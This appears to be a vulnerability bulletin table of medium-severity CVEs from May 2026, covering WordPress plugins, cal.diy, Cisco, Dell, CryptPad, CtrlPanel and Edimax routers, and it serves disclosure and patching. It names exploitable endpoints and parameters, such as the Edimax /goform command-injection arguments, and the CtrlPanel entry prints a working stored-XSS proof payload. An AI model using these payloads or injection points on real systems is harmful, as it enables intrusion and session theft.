| bigbluebutton--bigbluebutton | BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.19, the recording playback (presentation format) was not sanitizing user's input in public chat. This allowed for a malicious actor to craft and carry out a targeted XSS attack, activated on anyone replaying the recording. This issue has been fixed 3.0.19. | 2026-05-18 | 6.5 | CVE-2026-27737 | https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-8vv7-vj94-q2pv https://github.com/bigbluebutton/bbb-playback/commit/09e89bfe4ff8488b68c3ff040d3081e419dc89b1 https://github.com/bigbluebutton/bigbluebutton/commit/69f45aa1b963dc7d80179d0155acc670aec5c4fc https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.19 https://github.com/blindsidenetworks/scalelite/releases/tag/v1.7.0 |
| Brainstorm Force--Presto Player | Missing Authorization vulnerability in Brainstorm Force Presto Player allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Presto Player: from n/a through 4.1.3. | 2026-05-19 | 4.3 | CVE-2026-45442 | https://patchstack.com/database/wordpress/plugin/presto-player/vulnerability/wordpress-presto-player-plugin-4-1-3-broken-access-control-vulnerability?_s_id=cve |
| broadstreetads--Broadstreet | The Broadstreet plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.52.2 via the get_sponsored_meta AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disclose any private post metadata. | 2026-05-21 | 4.3 | CVE-2026-1881 | https://www.wordfence.com/threat-intel/vulnerabilities/id/328ccf8f-797b-4b1a-b0f1-afd8e44f41e6?source=cve https://plugins.trac.wordpress.org/changeset?old_path=%2Fbroadstreet/tags/1.52.2&new_path=%2Fbroadstreet/tags/1.53.2 |
| burlingtonbytes--WP Blockade Visual Page Builder | The WP Blockade plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcode' parameter in all versions up to and including 0.9.14. This is due to insufficient input sanitization and output escaping in the render_shortcode_preview() function. The function receives user input from $_GET['shortcode'], passes it through stripslashes() without any sanitization, and then outputs it directly via echo do_shortcode($shortcode) on line 393. When the input is not a valid WordPress shortcode (e.g., an HTML tag with JavaScript event handlers), do_shortcode() returns it unchanged, and it is reflected into the page without escaping. The endpoint is registered via admin_post_ (not admin_post_nopriv_), meaning it requires the user to be logged in with at minimum a Subscriber-level account. There is no nonce verification or additional capability check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute if they can successfully trick a user into performing an action such as clicking a link. | 2026-05-22 | 6.1 | CVE-2026-3481 | https://www.wordfence.com/threat-intel/vulnerabilities/id/66950509-ce2a-42fe-a8b2-2a92a1b573c3?source=cve https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L360 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L360 |
| calcom--cal.diy | A security flaw has been discovered in calcom cal.diy up to 4.9.4. The affected element is the function validateUrlForSSRF of the file apps/web/app/api/logo/route.ts of the component Logo API. The manipulation results in server-side request forgery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 5 | CVE-2026-9304 | VDB-365251 | calcom cal.diy Logo API route.ts validateUrlForSSRF server-side request forgery VDB-365251 | CTI Indicators (IOB, IOC, IOA) Submit #812176 | cal.com <= v4.9.4 Server-Side Request Forgery (CWE-918) https://gist.github.com/YLChen-007/b3d0b85767b7e346a291933d602fbb3b |
| calcom--cal.diy | A vulnerability was determined in calcom cal.diy up to 4.9.4. Affected by this issue is the function getServerSideProps of the file apps/web/modules/bookings/views/bookings-single-view.getServerSideProps.tsx of the component Generic React API. This manipulation of the argument cancelledBy/rescheduledBy causes information disclosure. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9349 | VDB-365312 | calcom cal.diy Generic React API bookings-single-view.getServerSideProps.tsx getServerSideProps information disclosure VDB-365312 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812177 | cal.com <= v4.9.4 Exposure of Sensitive Information (CWE-200) https://gist.github.com/YLChen-007/b59c44d1550c4b0f373ca4eb1c150994 |
| calcom--cal.diy | A vulnerability was identified in calcom cal.diy up to 4.9.4. Impacted is an unknown function. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 4.3 | CVE-2026-9303 | VDB-365250 | calcom cal.diy cross-site request forgery VDB-365250 | CTI Indicators (IOB, IOC) Submit #812173 | cal.com <= v4.9.4 Cross-Site Request Forgery (CWE-352) Submit #812175 | cal.com <= v4.9.4 Cross-Site Request Forgery (CWE-352) (Duplicate) https://gist.github.com/YLChen-007/26663d9558e15994176dc420d2e11d48 https://gist.github.com/YLChen-007/dafada36e356bc895b09829d8ec57e49 |
| Cisco--Cisco NX-OS Software | A vulnerability in the Border Gateway Protocol (BGP) enforce-first-as feature of Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to trigger BGP peer flaps, resulting in a denial of service (DoS) condition. This vulnerability is due to incorrect parsing of a transitive BGP attribute. An attacker could exploit this vulnerability by sending a crafted BGP update through an established BGP peer session. If the update propagates to an affected device, it could cause the device to drop the BGP session and flap with the BGP peer that is forwarding this update, resulting in a DoS condition. | 2026-05-20 | 6.8 | CVE-2026-20171 | cisco-sa-bgp-iefab-3hb2pwtx |
| Cisco--Cisco ThousandEyes Enterprise Agent | A vulnerability in the BrowserBot component of Cisco ThousandEyes Enterprise Agent could have allowed an authenticated, remote attacker to execute arbitrary commands on Agents on behalf of the BrowserBot synthetics orchestration process. Cisco has addressed this vulnerability in the Cisco ThousandEyes Enterprise Agent, and no customer action is needed. This vulnerability was due to insufficient input validation of command arguments that are supplied by the user. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by authenticating to the ThousandEyes SaaS and submitting crafted input into the affected parameter. A successful exploit could have allowed the attacker to execute arbitrary commands within the BrowserBot container as the node user. To exploit this vulnerability, the attacker must have valid user credentials for the ThousandEyes SaaS and the ability to manage transaction tests. | 2026-05-20 | 6.3 | CVE-2026-20206 | cisco-sa-tebbot-cmdinj-wN3yQ5gn |
| Cisco--Cisco ThousandEyes Enterprise Agent | A vulnerability in the SSL certificate handling of Cisco ThousandEyes Virtual Appliance could allow an authenticated, remote attacker to execute commands on the underlying operating system as the root user. This vulnerability is due to insufficient validation of user-supplied input. An authenticated attacker could exploit this vulnerability by uploading a crafted certificate to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-05-20 | 4.7 | CVE-2026-20199 | cisco-sa-tevacert-rce-RMJVEym5 |
| conoha--TypeSquare Webfonts for ConoHa | The TypeSquare Webfonts for ConoHa plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's site-wide font settings, including the typesquare_auth option (fontThemeUseType), show_post_form, and typesquare_fonttheme, by submitting a POST request to any wp-admin page. For fontThemeUseType values 1 and 3, no nonce verification is performed either, meaning those branches are additionally exploitable via cross-site request forgery. | 2026-05-20 | 4.3 | CVE-2026-8610 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88002a25-6890-4f8b-8a11-239b59d56672?source=cve https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L93 https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/inc/class/class.auth.php#L51 https://plugins.trac.wordpress.org/browser/ts-webfonts-for-conoha/tags/2.0.4/typesquare-admin.php#L25 |
| cryptpad--cryptpad | CryptPad is an end-to-end encrypted collaborative office suite. In versions prior to 2026.2.0, the HTML sanitizer in Diffmarked.js can be bypassed due to incomplete attribute filtering on restricted tags. The sanitizer validates only the src attribute of <iframe>, <video>, and <audio> elements, leaving all other attributes unchecked. As a result, an attacker can inject arbitrary HTML through srcdoc, completely defeating CryptPad's intended bounce sandboxing and enabling link injection or other interactive content within user-controlled documents. The root cause lies in how the sanitizer classifies and enforces tag restrictions: although it defines both forbidden and restricted tag lists, <iframe> is treated as "restricted" rather than "forbidden." Enforcement then inspects only the src attribute, so pairing a benign blob: src with a malicious srcdoc results in unrestricted rendering. This issue has been fixed in version 2026.2.0. | 2026-05-20 | 6.1 | CVE-2026-26028 | https://github.com/cryptpad/cryptpad/security/advisories/GHSA-g2g4-47gv-p72v https://github.com/cryptpad/cryptpad/releases/tag/2026.2.0 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the admin settings update endpoint accepted a fully qualified class name directly from user-supplied request input and used it for dynamic static method calls and object instantiation without any allowlist validation, allowing for authenticated Remote Code Execution. An authenticated admin-level user could supply an arbitrary class name available in the Composer autoloader, potentially triggering unintended constructor or magic method execution. The update() method reads settings_class directly from the HTTP request and passed it to new $settings_class() and $settings_class::getValidations() without verifying that the provided value corresponds to a legitimate settings class: Because PHP resolves class names against the Composer autoloader at runtime, any autoloadable class in the application or its dependencies could be instantiated. Depending on the classes available in the dependency tree, this can trigger unintended side effects through constructors or magic methods (__construct, __toString, __wakeup), following a PHP object injection / gadget chain pattern. This issue has been fixed in version 1.2.0. | 2026-05-19 | 6.6 | CVE-2026-34216 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-vcg3-fjrx-rg5q https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, multiple admin controllers expose DataTable endpoints without authorization checks, allowing any authenticated user to access sensitive administrative data that should be restricted to administrators only. The affected admin controllers define datatable() methods that are reachable via GET requests but lack any permission or role verification. Because the routes fall under the /admin/ prefix, operators may assume they are protected - however, the middleware applied to this route group does not enforce admin-level authorization on these specific endpoints. As a result, any authenticated user (regardless of role) can query these endpoints and receive paginated JSON responses containing sensitive records. Exploitation can result in enumeration of user PII, payment and transaction records, active voucher and coupon codes, role and permission structure, server ownership mappings and support ticket contents. This issue has been fixed in version 1.2.0. | 2026-05-19 | 6.5 | CVE-2026-34233 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-mj5g-j7fq-7hc4 https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability exists in the admin role management interface. In app/Http/Controllers/Admin/RoleController.php, the datatable() method interpolates $role->name and $role->color directly into a <span> element's HTML and style attribute without sanitization, and the chained .rawColumns(['actions', 'name']) call instructs DataTables to render the name column as raw HTML, bypassing automatic output escaping. An admin with role creation or edit permissions can inject a payload such as <img src=x onerror="alert('XSS_POC')"> into the name or color fields, which is persisted to the database and executes in the browser of every admin who loads the /admin/roles page. This enables session hijacking via cookie theft, credential harvesting through fake login prompts or keyloggers, lateral privilege escalation by performing admin actions on behalf of victims, and a persistent backdoor that re-executes on every page load until the malicious role record is removed. This issue has been resolved in version 1.2.0. | 2026-05-19 | 4.8 | CVE-2026-34246 | https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-wpqj-xwhq-2mmh https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0 |
| cvmh--Sticky | The Sticky plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `cvmh-sticky` shortcode `readmoretext` attribute in versions up to and including 2.5.6. This is due to insufficient input sanitization and output escaping in the `cvmh_sticky_front_render()` function - the `readmoretext` attribute value is passed through `apply_filters()` and directly concatenated into the HTML output without any escaping function such as `esc_html()`. This makes it possible for authenticated attackers with Contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a page containing the injected shortcode. | 2026-05-20 | 6.4 | CVE-2026-6397 | https://www.wordfence.com/threat-intel/vulnerabilities/id/135783c5-8175-4775-a013-f1e2bef04479?source=cve https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/functions.php#L118 https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/functions.php#L118 https://plugins.trac.wordpress.org/browser/sticky/trunk/includes/shortcode.php#L7 https://plugins.trac.wordpress.org/browser/sticky/tags/2.5.6/includes/shortcode.php#L7 |
| dartiss--Draft List | The Draft List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Draft Post Title in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The unescaped injection path is triggered specifically when the viewing user lacks edit capabilities, meaning payloads embedded in draft post titles via attribute-breakout techniques execute for unauthenticated users and subscribers. | 2026-05-22 | 6.4 | CVE-2026-9104 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07361278-7abb-4d22-a8df-218d3f982483?source=cve https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L396 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L305 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.3/inc/create-lists.php#L66 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L389 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L391 https://plugins.trac.wordpress.org/browser/simple-draft-list/tags/2.6.4/inc/create-lists.php#L394 |
| Dell--ECS | Dell ECS, versions 3.5 and 3.6, contain an Improper Access Control in the Identity and Access Management (IAM) module. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to gaining read access to unauthorized data. | 2026-05-22 | 5.9 | CVE-2022-31231 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P0000004RFTQA2/view |
| Dell--Live Optics | Dell Live Optics Windows and Personal Edition collectors contain an improper certificate validation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability leading to loss of confidentiality and integrity. | 2026-05-18 | 6.8 | CVE-2026-41119 | https://www.dell.com/support/kbdoc/en-us/000464862/dsa-2026-221-security-update-for-dell-live-optics-collector-ssl-vulnerability |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, versions 4.6.2 and prior, contains an Open Redirect Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability, leading to a targeted application user being redirected to arbitrary web URLs. The vulnerability could be leveraged by attackers to conduct phishing attacks that cause users to divulge sensitive information. | 2026-05-22 | 6.1 | CVE-2025-26483 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2026-05-22 | 5.3 | CVE-2025-32747 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure. | 2026-05-22 | 5.3 | CVE-2025-32749 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Insecure Storage of Sensitive Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. | 2026-05-22 | 5.5 | CVE-2025-32751 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Improper Certificate Validation vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Information tampering. | 2026-05-22 | 4.2 | CVE-2025-32745 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Insecure Storage of Sensitive Information vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to unauthorized access to sensitive information. | 2026-05-22 | 4 | CVE-2025-32746 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| Dell--SmartFabric Storage Software | Dell SmartFabric Storage Software, versions prior to 1.4.5, contains an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Filesystem access for attacker. | 2026-05-20 | 6.4 | CVE-2026-35070 | https://www.dell.com/support/kbdoc/en-us/000466942/dsa-2026-235-security-update-for-dell-networking-smartfabric-storage-software-vulnerabilities |
| Dell--Unisphere for PowerMax | Dell Unisphere for PowerMax vApp version prior to 10.0.0.2, contains an authorization bypass vulnerability in the Unisphere for VMAX application running in vApp | 2026-05-22 | 6.5 | CVE-2022-34363 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka06P000000xAiKQAU/view |
| Dell--VxRail | Dell VxRail versions before 7.0.200 contain a Plain-text Password Storage Vulnerability in VxRail Manager. A sys-admin user may exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account. | 2026-05-22 | 6.7 | CVE-2021-21508 | https://dellservices.lightning.force.com/lightning/r/Lightning_Knowledge__kav/ka0Do000000m7VwIAI/view |
| discourse--discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, outdated cached AI summaries can leak removed content to anonymous and unprivileged users who cannot regenerate summaries. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. To work around this issue, restrict summary generation by tightening the allowed groups on the summarization Personas. | 2026-05-19 | 5.3 | CVE-2026-32244 | https://github.com/discourse/discourse/security/advisories/GHSA-hjmg-2mww-vfvx |
| DumbWareio--DumbAssets | DumbAssets through 1.0.11 contains a stored cross-site scripting vulnerability in asset fields including name, description, modelNumber, serialNumber, and tags that are stored without server-side sanitization and rendered using innerHTML without client-side escaping. Attackers can create or update assets with HTML or JavaScript payloads via the asset API endpoints to execute arbitrary scripts in the browsers of users viewing the asset list, and with Content-Security-Policy disabled, the injected scripts can make unrestricted connections to internal network services. | 2026-05-18 | 6.1 | CVE-2026-45231 | https://github.com/DumbWareio/DumbAssets/pull/135 https://www.vulncheck.com/advisories/dumbassets-stored-cross-site-scripting-via-asset-fields |
| eazyserver--Sentence To SEO (keywords, description and tags) | The Sentence To SEO (keywords, description and tags) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the create_admin_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts and update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-6391 | https://www.wordfence.com/threat-intel/vulnerabilities/id/add32c06-90d0-466f-b176-aaae55cf03fb?source=cve https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L75 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L75 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L81 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L81 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L87 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L87 https://plugins.trac.wordpress.org/browser/sentence-to-seo/trunk/index.php#L50 https://plugins.trac.wordpress.org/browser/sentence-to-seo/tags/1.0/index.php#L50 |
| Edimax--BR-6228NC | A vulnerability was detected in Edimax BR-6228NC 1.22. Affected by this issue is the function mp of the file /goform/mp of the component POST Request Handler. The manipulation of the argument command results in command injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 6.3 | CVE-2026-8774 | VDB-364399 | Edimax BR-6228NC POST Request mp command injection VDB-364399 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811529 | EDIMAX BR6228NC BR-6228NCv2 (Version : v1.22) Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR6228NC-mp-34b53a41781f80db8aaed24e43ea24b9?source=copy_link |
| Edimax--BR-6428NS | A vulnerability was found in Edimax BR-6428NS 1.10. This issue affects the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component POST Request Handler. Performing a manipulation of the argument stadrv_ssid results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 6.3 | CVE-2026-8777 | VDB-364402 | Edimax BR-6428NS POST Request formStaDrvSetup command injection VDB-364402 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811532 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formStaDrvSetup-34b53a41781f80ca940cc467cd15dfc2?source=copy_link |
| Edimax--BR-6428NS | A weakness has been identified in Edimax BR-6428NS 1.10. This impacts the function system of the file /goform/formWlanM of the component POST Request Handler. Executing a manipulation of the argument ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P can lead to command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9296 | VDB-365243 | Edimax BR-6428NS POST Request formWlanM system command injection VDB-365243 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811535 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlanMP-34b53a41781f808fb207ce3f297db80b?source=copy_link |
| Edimax--BR-6428NS | A security vulnerability has been detected in Edimax BR-6428NS 1.10. Affected is the function formWlbasic of the file /goform/formWlbasic of the component POST Request Handler. The manipulation of the argument repeaterSSID leads to command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9297 | VDB-365244 | Edimax BR-6428NS POST Request formWlbasic command injection VDB-365244 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811536 | EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlbasic-34b53a41781f807fb398dbab03bdbb38?source=copy_link |
| Edimax--BR-6675nD | A security flaw has been discovered in Edimax BR-6675nD 1.12. This affects the function formHwSet of the file /goform/formHwSet of the component POST Request Handler. The manipulation of the argument regDomain/ABandregDomain/nic0Addr/nic1Addr/wlanAddr/inicAddr results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9378 | VDB-365341 | Edimax BR-6675nD POST Request formHwSet command injection VDB-365341 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811555 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formHwSet-34b53a41781f8077b588f6e7cbbed36b?source=copy_link |
| Edimax--BR-6675nD | A weakness has been identified in Edimax BR-6675nD 1.12. This impacts the function formWpsStart of the file /goform/formWpsStart of the component POST Request Handler. This manipulation of the argument pinCode causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9379 | VDB-365342 | Edimax BR-6675nD POST Request formWpsStart command injection VDB-365342 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811556 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection Submit #811567 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection (Duplicate) https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWpsStart-34b53a41781f8011b77ac5ebb77dfddd?source=copy_link |
| Edimax--BR-6675nD | A flaw has been found in Edimax BR-6675nD 1.12. This issue affects the function formUSBStorage of the file /goform/formUSBStorage of the component POST Request Handler. Executing a manipulation of the argument sub_dir can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9400 | VDB-365381 | Edimax BR-6675nD POST Request formUSBStorage command injection VDB-365381 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811562 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formUSBStorage-34b53a41781f80809fc9e6ab3c51328b?source=copy_link |
| Edimax--BR-6675nD | A vulnerability was found in Edimax BR-6675nD 1.12. The affected element is the function formWlanMP of the file /goform/formWlanMP of the component POST Request Handler. The manipulation of the argument ateFunc/ateGain/ateRate/ateChan/ateTxCount/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/ateTxFreqOffset/ateMode/ateMacID/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/readE2P/e2pTxPwDeltaN results in command injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9402 | VDB-365383 | Edimax BR-6675nD POST Request formWlanMP command injection VDB-365383 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811565 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWlanMP-34b53a41781f8041aa2ecb4fa1927f59?source=copy_link |
| Edimax--EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn up to 1.31. The affected element is the function formWpsStart of the file /goform/formWpsStart of the component webs. This manipulation of the argument pinCode causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9343 | VDB-365306 | Edimax EW-7438RPn webs formWpsStart os command injection VDB-365306 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813884 | Edimax EW-7438RPn 1.31 Command Injection Submit #811551 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection (Duplicate) https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_1/1.md |
| Edimax--EW-7438RPn | A vulnerability has been found in Edimax EW-7438RPn up to 1.31. Affected is the function formWizSurvey of the file /goform/formWizSurvey of the component webs. The manipulation of the argument ip/mask/gateway leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9347 | VDB-365310 | Edimax EW-7438RPn webs formWizSurvey os command injection VDB-365310 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813889 | Edimax EW-7438RPn 1.31 Command Injection Submit #811543 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection (Duplicate) https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_5/5.md |
